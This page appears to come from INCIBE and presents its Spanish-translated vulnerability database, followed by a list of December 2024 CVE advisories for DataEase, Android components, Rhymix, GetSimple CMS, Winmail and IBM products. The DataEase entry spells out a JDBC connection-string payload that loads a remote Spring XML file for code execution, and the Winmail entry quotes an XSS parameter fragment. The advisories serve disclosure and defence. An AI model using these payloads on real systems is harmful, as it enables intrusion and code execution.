Vulnerabilities

With the aim of informing, warning and helping professionals with the latest security vulnerabilities in technology systems, we have made a database available for users interested in this information, which is in Spanish and includes all of the latest documented and recognised vulnerabilities.

This repository, with over 75,000 registers, is based on the information from the NVD (National Vulnerability Database) – by virtue of a partnership agreement – through which INCIBE translates the included information into Spanish.

On occasions this list will show vulnerabilities that have still not been translated, as they are added while the INCIBE team is still carrying out the translation process. The CVE  (Common Vulnerabilities and Exposures) Standard for Information Security Vulnerability Names is used with the aim to support the exchange of information between different tools and databases.

All vulnerabilities collected are linked to different information sources, as well as available patches or solutions provided by manufacturers and developers. It is possible to carry out advanced searches, as there is the option to select different criteria to narrow down the results, some examples being vulnerability types, manufacturers and impact levels, among others.

Through RSS feeds or Newsletters we can be informed daily about the latest vulnerabilities added to the repository. Below there is a list, updated daily, where you can discover the latest vulnerabilities.

CVE-2024-55952

Publication date:
18/12/2024
DataEase is an open source business analytics tool. Authenticated users can remotely execute code through the backend JDBC connection. When constructing the jdbc connection string, the parameters are not filtered. Constructing the host as ip:5432/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://ip:5432/1.xml&a= can trigger the ClassPathXmlApplicationContext construction method. The vulnerability has been fixed in v1.18.27. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Severity CVSS v4.0: HIGH
Last modification:
20/02/2025

CVE-2024-47039

Publication date:
18/12/2024
In isSlotMarkedSuccessful of BootControl.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local  information disclosure with no additional execution privileges needed. User  interaction is not needed for exploitation.
Severity CVSS v4.0: CRITICAL
Last modification:
18/12/2024

CVE-2024-47040

Publication date:
18/12/2024
There is a possible UAF due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.
Severity CVSS v4.0: CRITICAL
Last modification:
18/12/2024

CVE-2024-47038

Publication date:
18/12/2024
In dhd_prot_flowrings_pool_release of dhd_msgbuf.c, there is a possible outcof bounds write due to a missing bounds check. This could lead to localcescalation of privilege with no additional execution privileges needed. Usercinteraction is not needed for exploitation.
Severity CVSS v4.0: CRITICAL
Last modification:
18/12/2024

CVE-2024-55089

Publication date:
18/12/2024
Rhymix 2.1.19 is vulnerable to Server-Side Request Forgery (SSRF) in the background import data function.
Severity CVSS v4.0: Pending analysis
Last modification:
17/03/2025

CVE-2024-55088

Publication date:
18/12/2024
GetSimple CMS CE 3.3.19 is vulnerable to Server-Side Request Forgery (SSRF) in the backend plugin module.
Severity CVSS v4.0: Pending analysis
Last modification:
17/04/2025

CVE-2024-55492

Publication date:
18/12/2024
Winmail Server 4.4 is vulnerable to f_user=%22%3E%3Csvg%20onload Cross Site Scripting (XSS).
Severity CVSS v4.0: Pending analysis
Last modification:
18/12/2024

CVE-2024-55086

Publication date:
18/12/2024
In the GetSimple CMS CE 3.3.19 management page, Server-Side Request Forgery (SSRF) can be achieved in the plug-in download address in the backend management system.
Severity CVSS v4.0: Pending analysis
Last modification:
18/04/2025

CVE-2024-25042

Publication date:
18/12/2024
IBM Cognos Analytics 11.2.0 through 11.2.4 and 12.0.0 through 12.0.3 <br /> <br /> <br /> <br /> is potentially vulnerable to Cross Site Scripting (XSS). A remote attacker could execute malicious commands due to improper validation of column headings in Cognos Explorations.
Severity CVSS v4.0: Pending analysis
Last modification:
10/01/2025

CVE-2024-41752

Publication date:
18/12/2024
IBM Cognos Analytics 11.2.0 through 11.2.4 and 12.0.0 through 12.0.3 is vulnerable to HTML injection. A remote attacker could inject malicious HTML code, which when viewed, would be executed in the victim&amp;#39;s Web browser within the security context of the hosting site.
Severity CVSS v4.0: Pending analysis
Last modification:
10/01/2025

CVE-2024-45082

Publication date:
18/12/2024
IBM Cognos Analytics 11.2.0 through 11.2.4 and 12.0.0 through 12.0.3 <br /> <br /> could allow a remote attacker to conduct phishing attacks, using an open redirect attack. By persuading a victim to visit a specially crafted Web site, a remote attacker could exploit this vulnerability to spoof the URL displayed to redirect a user to a malicious Web site that would appear to be trusted.
Severity CVSS v4.0: Pending analysis
Last modification:
10/01/2025

CVE-2024-47119

Publication date:
18/12/2024
IBM Storage Defender - Resiliency Service 2.0.0 through 2.0.9 does not properly validate a certificate which could allow an attacker to spoof a trusted entity by interfering in the communication path between the host and client.
Severity CVSS v4.0: Pending analysis
Last modification:
18/12/2024